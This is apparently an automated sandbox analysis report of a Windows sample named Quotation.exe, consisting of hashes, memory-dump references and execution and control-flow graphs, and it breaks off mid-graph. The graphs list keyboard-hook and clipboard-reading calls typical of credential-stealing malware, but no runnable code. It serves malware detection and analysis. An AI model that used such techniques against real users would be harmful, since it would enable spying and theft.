                                                                                    • API ID: MessageSend$InitializeUninitialize
                                                                                    • String ID: Fingersprogs Setup: Installing
                                                                                    • API String ID: 1011633862-1250855830
                                                                                    • Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                                    • Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
                                                                                    • Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                                    • Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403436,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406CF4
                                                                                    • CharPrevW.USER32(?,00000000), ref: 00406D05
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrlen
                                                                                    • String ID: C:\Users\user\Desktop
                                                                                    • API String ID: 2709904686-2743851969
                                                                                    • Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                                                                    • Instruction ID: 8ca8e9e1e5128dac63b4d4f5950f4db4f9885d0bf84f26727eb387c0c5501f09
                                                                                    • Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                                                                    • Instruction Fuzzy Hash: 75D05E31015924DBD7626B18ED059AF77A8EF0130030A846EE983E3164CB385C9187BD

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.7%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:166
                                                                                    Total number of Limit Nodes:14
                                                                                    execution_graph 41830 39792378 41831 397923e0 CreateWindowExW 41830->41831 41833 3979249c 41831->41833 42010 39795e88 42011 39795e89 GetCurrentProcess 42010->42011 42013 39795f19 42011->42013 42014 39795f20 GetCurrentThread 42011->42014 42013->42014 42015 39795f5d GetCurrentProcess 42014->42015 42016 39795f56 42014->42016 42017 39795f93 42015->42017 42016->42015 42018 39795fbb GetCurrentThreadId 42017->42018 42019 39795fec 42018->42019 41834 397997f0 41835 39799834 SetWindowsHookExA 41834->41835 41837 3979987a 41835->41837 41838 397960d0 DuplicateHandle 41839 39796166 41838->41839 41840 39797cb0 41841 39797d0a OleGetClipboard 41840->41841 41842 39797d4a 41841->41842 42020 39797260 42021 39797268 42020->42021 42023 3979728b 42021->42023 42024 39795d14 42021->42024 42025 397972a0 KiUserCallbackDispatcher 42024->42025 42027 3979730e 42025->42027 42027->42021 41843 ad044 41844 ad05c 41843->41844 41845 ad0b6 41844->41845 41850 3979065c 41844->41850 41861 39792522 41844->41861 41865 39792530 41844->41865 41869 39796cd0 41844->41869 41851 39790667 41850->41851 41852 39796d41 41851->41852 41854 39796d31 41851->41854 41855 39796d3f 41852->41855 41908 39795cbc 41852->41908 41880 39796e68 41854->41880 41886 39796e58 41854->41886 41892 398f1240 41854->41892 41898 398f1280 41854->41898 41903 398f1288 41854->41903 41862 39792531 41861->41862 41863 3979065c 4 API calls 41862->41863 41864 39792577 41863->41864 41864->41845 41866 39792556 41865->41866 41867 3979065c 4 API calls 41866->41867 41868 39792577 41867->41868 41868->41845 41872 39796cdc 41869->41872 41870 39796d41 41871 39795cbc 4 API calls 41870->41871 41874 39796d3f 41870->41874 41871->41874 41872->41870 41873 39796d31 41872->41873 41875 39796e68 4 API calls 41873->41875 41876 39796e58 4 API calls 41873->41876 41877 398f1288 4 API calls 41873->41877 41878 398f1280 4 API calls 41873->41878 41879 398f1240 4 API calls 41873->41879 41875->41874 41876->41874 41877->41874 41878->41874 41879->41874 41882 39796e76 41880->41882 41881 39795cbc 4 API calls 41881->41882 41882->41881 41883 39796f4e 41882->41883 41915 39797331 41882->41915 41919 39797340 41882->41919 41883->41855 41888 39796e5c 41886->41888 41887 39795cbc 4 API calls 41887->41888 41888->41887 41889 39796f4e 41888->41889 41890 39797331 OleInitialize 41888->41890 41891 39797340 OleInitialize 41888->41891 41889->41855 41890->41888 41891->41888 41895 398f124c 41892->41895 41893 398f1250 41893->41855 41894 398f1328 41894->41855 41895->41893 41973 398f132f 41895->41973 41979 398f1340 41895->41979 41899 398f129c 41898->41899 41901 398f132f 4 API calls 41899->41901 41902 398f1340 4 API calls 41899->41902 41900 398f1328 41900->41855 41901->41900 41902->41900 41905 398f1289 41903->41905 41904 398f1328 41904->41855 41906 398f132f 4 API calls 41905->41906 41907 398f1340 4 API calls 41905->41907 41906->41904 41907->41904 41909 39795cc7 41908->41909 41910 39796faa 41909->41910 41911 39797054 41909->41911 41912 39797002 CallWindowProcW 41910->41912 41914 39796fb1 41910->41914 41913 3979065c 3 API calls 41911->41913 41912->41914 41913->41914 41914->41855 41917 39797334 41915->41917 41916 39797326 41916->41882 41917->41916 41923 397978e7 41917->41923 41920 3979735f 41919->41920 41921 39797458 41920->41921 41922 397978e7 OleInitialize 41920->41922 41921->41882 41922->41920 41924 397978f4 41923->41924 41925 3979792d 41923->41925 41924->41925 41927 397978f8 41924->41927 41929 39797973 41925->41929 41933 3979793f OleInitialize 41925->41933 41935 39797940 OleInitialize 41925->41935 41936 397978e7 OleInitialize 41925->41936 41953 397979ff 41925->41953 41926 39797914 41926->41917 41927->41926 41932 397978e7 OleInitialize 41927->41932 41937 3979793f 41927->41937 41945 39797940 41927->41945 41928 39797929 41928->41917 41929->41917 41932->41928 41933->41929 41935->41929 41936->41929 41938 39797952 41937->41938 41939 397979b1 41938->41939 41941 3979793f OleInitialize 41938->41941 41942 397979ff OleInitialize 41938->41942 41943 39797940 OleInitialize 41938->41943 41944 397978e7 OleInitialize 41938->41944 41939->41928 41940 39797973 41940->41928 41941->41940 41942->41940 41943->41940 41944->41940 41946 39797952 41945->41946 41948 397979b1 41946->41948 41949 3979793f OleInitialize 41946->41949 41950 397979ff OleInitialize 41946->41950 41951 39797940 OleInitialize 41946->41951 41952 397978e7 OleInitialize 41946->41952 41947 39797973 41947->41928 41948->41928 41949->41947 41950->41947 41951->41947 41952->41947 41954 39797a18 41953->41954 41955 39797a2d 41954->41955 41958 39797ae9 41954->41958 41962 39797af0 41954->41962 41955->41929 41959 39797af8 41958->41959 41966 397975b8 41959->41966 41963 39797af8 41962->41963 41964 397975b8 OleInitialize 41963->41964 41965 39797b01 41964->41965 41965->41955 41967 397975c3 41966->41967 41968 39797b01 41967->41968 41970 39795e6c 41967->41970 41968->41955 41971 39797b68 OleInitialize 41970->41971 41972 39797bcc 41971->41972 41972->41968 41974 398f133c 41973->41974 41975 398f1375 41973->41975 41976 398f1351 41974->41976 41983 398f24a8 41974->41983 41989 398f2501 41974->41989 41976->41894 41980 398f1351 41979->41980 41981 398f24a8 4 API calls 41979->41981 41982 398f2501 4 API calls 41979->41982 41980->41894 41981->41980 41982->41980 41984 398f246b 41983->41984 41984->41983 41985 398f24d4 41984->41985 41987 39795cbc 4 API calls 41984->41987 41995 39796f59 41984->41995 42002 39795c8f 41984->42002 41985->41976 41987->41985 41990 398f2504 41989->41990 41991 398f251a 41989->41991 41990->41991 41992 39796f59 4 API calls 41990->41992 41993 39795cbc 4 API calls 41990->41993 41994 39795c8f 4 API calls 41990->41994 41991->41976 41992->41991 41993->41991 41994->41991 41996 39796f64 41995->41996 41997 39796faa 41996->41997 41998 39797054 41996->41998 41999 39797002 CallWindowProcW 41997->41999 42001 39796fb1 41997->42001 42000 3979065c 3 API calls 41998->42000 41999->42001 42000->42001 42001->41985 42004 39795ca5 42002->42004 42003 39795cf5 42004->42003 42005 39796faa 42004->42005 42006 39797054 42004->42006 42007 39797002 CallWindowProcW 42005->42007 42009 39796fb1 42005->42009 42008 3979065c 3 API calls 42006->42008 42007->42009 42008->42009 42009->41985
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,DC8$,DC8$>C8U$FC8
                                                                                    • API String ID: 0-1728873124
                                                                                    • Opcode ID: cde3940df20981b6003293627ca1744d0b02d6a705f721173aa62d31cfb62e77
                                                                                    • Instruction ID: b00315e9e53cea2eff84aeefad6e96e6d77bbc0ad43602177613d8dd3e15ffba
                                                                                    • Opcode Fuzzy Hash: cde3940df20981b6003293627ca1744d0b02d6a705f721173aa62d31cfb62e77
                                                                                    • Instruction Fuzzy Hash: 5A922638A007098FDB14DB68C694B9DBBF2EB49394F5484A9D409AF361DB75EC81CF90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1313 392b3108-392b3129 1314 392b312b-392b312e 1313->1314 1315 392b38cf-392b38d2 1314->1315 1316 392b3134-392b3153 1314->1316 1317 392b38f8-392b38fa 1315->1317 1318 392b38d4-392b38f3 1315->1318 1325 392b316c-392b3176 1316->1325 1326 392b3155-392b3158 1316->1326 1319 392b38fc 1317->1319 1320 392b3901-392b3904 1317->1320 1318->1317 1319->1320 1320->1314 1323 392b390a-392b3913 1320->1323 1331 392b317c-392b318b 1325->1331 1326->1325 1328 392b315a-392b316a 1326->1328 1328->1331 1439 392b318d call 392b3928 1331->1439 1440 392b318d call 392b3921 1331->1440 1332 392b3192-392b3197 1333 392b3199-392b319f 1332->1333 1334 392b31a4-392b3481 1332->1334 1333->1323 1355 392b38c1-392b38ce 1334->1355 1356 392b3487-392b3536 1334->1356 1365 392b3538-392b355d 1356->1365 1366 392b355f 1356->1366 1368 392b3568-392b357b 1365->1368 1366->1368 1370 392b38a8-392b38b4 1368->1370 1371 392b3581-392b35a3 1368->1371 1370->1356 1372 392b38ba 1370->1372 1371->1370 1374 392b35a9-392b35b3 1371->1374 1372->1355 1374->1370 1375 392b35b9-392b35c4 1374->1375 1375->1370 1376 392b35ca-392b36a0 1375->1376 1388 392b36ae-392b36de 1376->1388 1389 392b36a2-392b36a4 1376->1389 1393 392b36ec-392b36f8 1388->1393 1394 392b36e0-392b36e2 1388->1394 1389->1388 1395 392b36fa-392b36fe 1393->1395 1396 392b3758-392b375c 1393->1396 1394->1393 1395->1396 1399 392b3700-392b372a 1395->1399 1397 392b3899-392b38a2 1396->1397 1398 392b3762-392b379e 1396->1398 1397->1370 1397->1376 1410 392b37ac-392b37ba 1398->1410 1411 392b37a0-392b37a2 1398->1411 1406 392b3738-392b3755 1399->1406 1407 392b372c-392b372e 1399->1407 1406->1396 1407->1406 1413 392b37bc-392b37c7 1410->1413 1414 392b37d1-392b37dc 1410->1414 1411->1410 1413->1414 1417 392b37c9 1413->1417 1418 392b37de-392b37e4 1414->1418 1419 392b37f4-392b3805 1414->1419 1417->1414 1420 392b37e8-392b37ea 1418->1420 1421 392b37e6 1418->1421 1423 392b381d-392b3829 1419->1423 1424 392b3807-392b380d 1419->1424 1420->1419 1421->1419 1428 392b382b-392b3831 1423->1428 1429 392b3841-392b3892 1423->1429 1425 392b380f 1424->1425 1426 392b3811-392b3813 1424->1426 1425->1423 1426->1423 1430 392b3833 1428->1430 1431 392b3835-392b3837 1428->1431 1429->1397 1430->1429 1431->1429 1439->1332 1440->1332
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,FC8$FC8
                                                                                    • API String ID: 0-3820766305
                                                                                    • Opcode ID: 0ca67c1a73199b94d3df9adff0c9490fc4b6dff818658e0ba4c17c8368121ee8
                                                                                    • Instruction ID: e0a9295745ef18876ad167d8ddd554b6b73c3190d71bdad6eeb60e68a5bdd052
                                                                                    • Opcode Fuzzy Hash: 0ca67c1a73199b94d3df9adff0c9490fc4b6dff818658e0ba4c17c8368121ee8
                                                                                    • Instruction Fuzzy Hash: 3C323E35E10719CFDB15DB69C85499DB7B2FFC9340F60C69AE409AB210EB70AA85CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f29b1f577ea0b1bece77c615b1f7dbd4a778cecdf29b88d375bb1d0c9942f1a
                                                                                    • Instruction ID: 80847d07ca8ab4aef6daf5b93d789eec9bd83daddbed6a0965da324818ab8e18
                                                                                    • Opcode Fuzzy Hash: 9f29b1f577ea0b1bece77c615b1f7dbd4a778cecdf29b88d375bb1d0c9942f1a
                                                                                    • Instruction Fuzzy Hash: 2463F831D10B1A8ADB11EF68C8945A9F7B1FF99300F51D79AE45877221FB70AAC4CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d208cf09e0df37517483444d093427093ce0c57647a8ea80caf0a9636eab6b13
                                                                                    • Instruction ID: c61db22eb77a95481326178e87270137e6ed93b4cc844f3bc47f445e5a6fd5ea
                                                                                    • Opcode Fuzzy Hash: d208cf09e0df37517483444d093427093ce0c57647a8ea80caf0a9636eab6b13
                                                                                    • Instruction Fuzzy Hash: 6143E631D10B1A8ADB11EF68C8945A9F7B1FF99300F51D79AE45877221EB70AAC4CF81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,DC8
                                                                                    • API String ID: 0-1332039390
                                                                                    • Opcode ID: 12c4c3c4736388676c41e51db9261b54071589e2dbe69db0397c390393bd8a0b
                                                                                    • Instruction ID: b86e64563afaac1f32fe42ac132346dd7d37062bc01a519e88c3089ed3f911b0
                                                                                    • Opcode Fuzzy Hash: 12c4c3c4736388676c41e51db9261b54071589e2dbe69db0397c390393bd8a0b
                                                                                    • Instruction Fuzzy Hash: 89628E34A00A059FEF04EB68C555A9DBBF2EF883A0F248569E405EF351DB75EC46CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $
                                                                                    • API String ID: 0-3993045852
                                                                                    • Opcode ID: 5a846c418d5c85bfabde32f15b8b2a48577501c1db0c980a6c35530ef4470871
                                                                                    • Instruction ID: 3b7d75d3427e986695994d069281e0763b6d31c74587364da0860ce1c02e6aff
                                                                                    • Opcode Fuzzy Hash: 5a846c418d5c85bfabde32f15b8b2a48577501c1db0c980a6c35530ef4470871
                                                                                    • Instruction Fuzzy Hash: C422C235E006558FEF14DBA4C581A9EBBF2EF853A0F24856AD409AF345DB35EC42CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DRC8
                                                                                    • API String ID: 0-2841399024
                                                                                    • Opcode ID: b8bb48e9936d90a1d583aa1bcaaa99f665d96aebe06e214afc008e85ce879a9c
                                                                                    • Instruction ID: cdbba6e08e83b56210363be23b6e24d294a788baad4eaa2c72e7a6bd8f338f48
                                                                                    • Opcode Fuzzy Hash: b8bb48e9936d90a1d583aa1bcaaa99f665d96aebe06e214afc008e85ce879a9c
                                                                                    • Instruction Fuzzy Hash: 0702D434B00A059FEF04DB69C55569EBBF2FF84790F248569E809AB381DB75EC42CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: )9
                                                                                    • API String ID: 0-1520043292
                                                                                    • Opcode ID: 6c88736bd0c375c54b730a93a4a2a3af7e268b8a61b8faf7cea4452952635333
                                                                                    • Instruction ID: 07ab4a8d925a157b73edc0116be4d443761d49a815fa3f9a444c2ad265ab0fe4
                                                                                    • Opcode Fuzzy Hash: 6c88736bd0c375c54b730a93a4a2a3af7e268b8a61b8faf7cea4452952635333
                                                                                    • Instruction Fuzzy Hash: D4B1B530F043548FDB28AB79985467E7BB7AFC8750B15852ED406EB384DE38DC0297A6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \Vgm
                                                                                    • API String ID: 0-3507608961
                                                                                    • Opcode ID: 8d4841aa62f0452f31a17835edf3295cfd4eb802175f790cec73147f945d3b4a
                                                                                    • Instruction ID: 5975d5e268f5dae28e5fdc4dde2d5c5035efcb8cad945d0b75238bfc07cf702b
                                                                                    • Opcode Fuzzy Hash: 8d4841aa62f0452f31a17835edf3295cfd4eb802175f790cec73147f945d3b4a
                                                                                    • Instruction Fuzzy Hash: E5914B70E003099FDF50CFA9C8857AEBBF2AF88304F14812AE415A7354EB749985CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b334adaac0636103fae4d29192fb73131f823be06580e106c44c85a8b6a6e2e6
                                                                                    • Instruction ID: 285c4789e80698df8fb65842c227e46aa653332a9c9fb3f2b83e57b84dc9aab4
                                                                                    • Opcode Fuzzy Hash: b334adaac0636103fae4d29192fb73131f823be06580e106c44c85a8b6a6e2e6
                                                                                    • Instruction Fuzzy Hash: 15328134B006099FEF15DB68C995B9DBBF2FB89390F208526E405EB351DB75EC428B90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ac77a8b8161c0fba80a6a8c68deac6402d6c160a249be341b35377ce909044eb
                                                                                    • Instruction ID: 51d0e43a838d371b179ca229875618bbb00b575b2ae02d7a6dbe609a38f5079b
                                                                                    • Opcode Fuzzy Hash: ac77a8b8161c0fba80a6a8c68deac6402d6c160a249be341b35377ce909044eb
                                                                                    • Instruction Fuzzy Hash: 3E226F78E0064B9FEF10CA68C59179EB7F2EB49390F60852AF445EF351DA34EC819B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a075a0cc61c1524367b337fdfd74a9944ef9919369899fae0f67337da3d90477
                                                                                    • Instruction ID: 2d180445eeec734334e630b0441e2c0d6bf459b4fd7816935f87055b4ac44dde
                                                                                    • Opcode Fuzzy Hash: a075a0cc61c1524367b337fdfd74a9944ef9919369899fae0f67337da3d90477
                                                                                    • Instruction Fuzzy Hash: D3D19E71B002058FDB54CFA8D88079EBBF1EB89310F24856AE809EB395DB75DD45CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 654484021dcf718eed85ffa6349590f1156bc1a669789c7b4f348db72103cb3d
                                                                                    • Instruction ID: 972de5f6c312741a540db69773d6fee175badb963b41bcfbe249ea4974b43be9
                                                                                    • Opcode Fuzzy Hash: 654484021dcf718eed85ffa6349590f1156bc1a669789c7b4f348db72103cb3d
                                                                                    • Instruction Fuzzy Hash: 8BC1DF31B003159FDB14DB68C880B6EBBA6EB85710F24856AE415DF395DB71EC82CBE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aa6c201aefc950f36d54de6c189529c6f9339e4f2ffa4877c1b32acac736a69c
                                                                                    • Instruction ID: bb48239548b372a1543ef2184289ef07837770ad1703e5033acb887801ebbe7c
                                                                                    • Opcode Fuzzy Hash: aa6c201aefc950f36d54de6c189529c6f9339e4f2ffa4877c1b32acac736a69c
                                                                                    • Instruction Fuzzy Hash: 64B14E70E003098FDB50CFA9D8857ADBBF2AF88714F14852AD815EB354EB759885CBA1

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 39795F06
                                                                                    • GetCurrentThread.KERNEL32 ref: 39795F43
                                                                                    • GetCurrentProcess.KERNEL32 ref: 39795F80
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 39795FD9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID: &*6L'*6
                                                                                    • API String ID: 2063062207-2540141361
                                                                                    • Opcode ID: f6c48bdf5ce8413c0d34f1efd1b1a7b6b572af99f6911f179022fc011459d66e
                                                                                    • Instruction ID: 8369e5014b1b98e5500f0c56b91eccea2235eb603734a0c25c7ee232d46633e6
                                                                                    • Opcode Fuzzy Hash: f6c48bdf5ce8413c0d34f1efd1b1a7b6b572af99f6911f179022fc011459d66e
                                                                                    • Instruction Fuzzy Hash: A25198B09057498FDB04CFAAD549BDEBBF1FF49310F20805AE419AB3A0D734A944CBA5

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 39795F06
                                                                                    • GetCurrentThread.KERNEL32 ref: 39795F43
                                                                                    • GetCurrentProcess.KERNEL32 ref: 39795F80
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 39795FD9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID: &*6L'*6
                                                                                    • API String ID: 2063062207-2540141361
                                                                                    • Opcode ID: 6b0fa691c821da67becb41fb3d1c0e4f8afdc1ddf69d0247a2da3dada9b7db01
                                                                                    • Instruction ID: 07b4f02da4ccaeb4c8ca257b4518349c10f93a662232a56b8748457eadb16da6
                                                                                    • Opcode Fuzzy Hash: 6b0fa691c821da67becb41fb3d1c0e4f8afdc1ddf69d0247a2da3dada9b7db01
                                                                                    • Instruction Fuzzy Hash: 5E5146B09147098FDB54CFAAD549BDEBBF1EF48320F208059E419AB3A0D774A940CF65

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 56 d86c8-d86d0 58 d8719-d871f 56->58 59 d86d2-d86da 56->59 63 d873c-d873f 58->63 60 d86dc 59->60 61 d86e6-d86ea 59->61 60->63 64 d86de-d86e5 60->64 69 d86ec 61->69 70 d86f6 61->70 65 d8741-d8744 63->65 64->61 67 d8746 65->67 68 d8771-d8774 65->68 75 d874c 67->75 72 d8776-d879c 68->72 73 d87a1-d87a4 68->73 74 d86ed-d86f3 69->74 69->75 71 d86f7-d86ff 70->71 71->58 72->73 76 d87a6-d87cc 73->76 77 d87d1-d87d4 73->77 74->70 75->71 78 d874e-d876c 75->78 76->77 79 d87d6-d87fc 77->79 80 d8801-d8804 77->80 78->68 79->80 83 d8806-d882c 80->83 84 d8831-d8834 80->84 83->84 87 d8836-d885c 84->87 88 d8861-d8864 84->88 87->88 92 d8866-d888c 88->92 93 d8891-d8894 88->93 92->93 96 d88a5-d88a8 93->96 97 d8896-d8898 93->97 102 d88aa 96->102 103 d88b5-d88b8 96->103 285 d889a call d9f70 97->285 286 d889a call d9f80 97->286 287 d889a call da023 97->287 114 d88b0 102->114 109 d88ba-d88e0 103->109 110 d88e5-d88e8 103->110 106 d88a0 106->96 109->110 112 d88ea-d8910 110->112 113 d8915-d8918 110->113 112->113 117 d891a-d8940 113->117 118 d8945-d8948 113->118 114->103 117->118 121 d894a-d8970 118->121 122 d8975-d8978 118->122 121->122 124 d897a-d89a0 122->124 125 d89a5-d89a8 122->125 124->125 128 d89aa-d89d0 125->128 129 d89d5-d89d8 125->129 128->129 133 d89da-d8a00 129->133 134 d8a05-d8a08 129->134 133->134 137 d8a0a-d8a30 134->137 138 d8a35-d8a38 134->138 137->138 143 d8a3a-d8a60 138->143 144 d8a65-d8a68 138->144 143->144 147 d8a6a-d8a90 144->147 148 d8a95-d8a98 144->148 147->148 153 d8a9a-d8ac0 148->153 154 d8ac5-d8ac8 148->154 153->154 157 d8aca-d8af0 154->157 158 d8af5-d8af8 154->158 157->158 163 d8afa-d8b20 158->163 164 d8b25-d8b28 158->164 163->164 167 d8b2a-d8b50 164->167 168 d8b55-d8b58 164->168 167->168 173 d8b5a-d8b80 168->173 174 d8b85-d8b88 168->174 173->174 177 d8b8a-d8bb0 174->177 178 